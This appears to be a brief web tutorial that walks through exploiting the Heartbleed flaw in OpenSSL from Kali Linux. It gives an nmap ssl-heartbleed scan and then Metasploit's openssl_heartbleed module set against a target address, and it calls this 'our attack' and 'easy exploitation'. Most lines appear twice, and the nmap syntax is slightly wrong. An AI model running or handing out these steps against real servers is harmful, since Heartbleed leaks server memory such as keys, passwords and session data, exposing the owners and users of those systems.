Now type in terminal.. Use Kali Linux. For test ssl:
1.nmap -sV script=ssl-heartbleed 192.168.31.1
nmap -sV script=ssl-heartbleed 192.168.31.1
2.msfconsole
msfconsole
Now choose openssl_heartbleed
openssl_heartbleed
msf > use auxiliary/scanner/ssl/openssl_heartbleed
For show options write : show options
show options
Now proceed to our attack: set RHOSTS 192.168.31.1
set RHOSTS 192.168.31.1
set RPORT 443
set verbose true
exploit
Easy exploitation :) Also let’s take a look at the article : https://www.hackthis.co.uk/articles/heartbleed-the-door-to-secret-communications
This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.
By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.